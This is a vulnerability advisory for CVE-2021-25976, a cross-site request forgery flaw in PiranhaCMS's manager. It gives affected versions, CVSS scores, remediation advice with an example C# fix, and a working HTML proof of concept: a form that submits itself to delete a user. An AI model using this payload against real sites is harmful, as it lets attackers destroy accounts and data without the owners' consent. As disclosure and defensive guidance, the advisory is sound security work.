CVE-2021-25976
Date: November 16, 2021
Overview
PiranhaCMS versions 4.0.0-alpha1 to 9.2.0 are vulnerable to cross-site request forgery (CSRF) when performing various actions supported by the management system, such as deleting a user, deleting a role, editing a post, deleting a media folder, etc., when an ID is known.
Details
PiranhaCMS is vulnerable to cross-site request forgery (CSRF) when performing various actions supported by the management system, such as deleting a user, deleting a role, editing a post, deleting a media folder, etc., when an ID is known.
PoC Details
Host the HTML page below on a different web server. When a user accesses the malicious HTML page, a request to delete the user is issued.
Once the response is received for the request, we can see that the user was successfully deleted.
PoC Code
<html>
<body>
<form action="http://piranhacms.com:5000/manager/user/delete/99b29f16-0bfa-477b-9d5f-b34efbbf2b8a">
<input type="submit" value="Submit request" />
</form>
<script>document.forms[0].submit()</script>
</body>
</html>
Affected Environments
Vulnerable GitHub Versions: v4.0.0-alpha1 to v9.2; Vulnerable Nuget Versions: 4.0.0-alpha1 to 9.2.0
Remediation
According to the HTTP specifications, GET requests should be idempotent (non-state-changing). When performing actions such as deleting users, use a different HTTP method, such as DELETE.
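The remediation above, sketched as an added example for a generic ASP.NET Core MVC controller; this is not Piranha.Manager source code. The `IUserStore` interface and both controller names are hypothetical, and the `[AutoValidateAntiforgeryToken]` filter is an extra defense that goes beyond the method change the advisory recommends.

```csharp
// Added illustration only: hypothetical ASP.NET Core controllers, not Piranha.Manager code.
using System;
using Microsoft.AspNetCore.Authorization;
using Microsoft.AspNetCore.Mvc;

// Hypothetical user store used only by this example.
public interface IUserStore
{
    bool Delete(Guid id);
}

[Authorize]
[Route("manager/user")]
public class UserBeforeController : Controller
{
    private readonly IUserStore _users;
    public UserBeforeController(IUserStore users) => _users = users;

    // BEFORE: a state change reachable by GET. Any cross-site page that makes the
    // browser load this URL sends the manager's session cookie along with it,
    // so the deletion runs with the logged-in user's privileges.
    [HttpGet("delete/{id:guid}")]
    public IActionResult Delete(Guid id) =>
        _users.Delete(id) ? Ok() : NotFound();
}

[Authorize]
[Route("manager/user")]
[AutoValidateAntiforgeryToken] // validates a token on POST/PUT/PATCH/DELETE; GET/HEAD/OPTIONS/TRACE are exempt
public class UserAfterController : Controller
{
    private readonly IUserStore _users;
    public UserAfterController(IUserStore users) => _users = users;

    // AFTER: only the DELETE method is routed to this action. HTML forms can submit
    // GET or POST only, so an auto-submitting form no longer matches the route, and
    // the antiforgery filter rejects a DELETE that lacks the per-session token.
    [HttpDelete("delete/{id:guid}")]
    public IActionResult Delete(Guid id) =>
        _users.Delete(id) ? NoContent() : NotFound();
}
```

A quick regression check for the fix is to request the delete URL with GET while authenticated and confirm the response is 405 Method Not Allowed and the user still exists.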
Prevention
Update to Piranha.Manager version 10.0.0
Language: C#
Good to know:
Base Score: | |
---|---|
Attack Vector (AV): | Network |
Attack Complexity (AC): | Low |
Privileges Required (PR): | None |
User Interaction (UI): | Required |
Scope (S): | Unchanged |
Confidentiality (C): | None |
Integrity (I): | High |
Availability (A): | High |

Base Score: | |
---|---|
Access Vector (AV): | Network |
Access Complexity (AC): | High |
Authentication (AU): | None |
Confidentiality (C): | None |
Integrity (I): | Partial |
Availability (A): | Partial |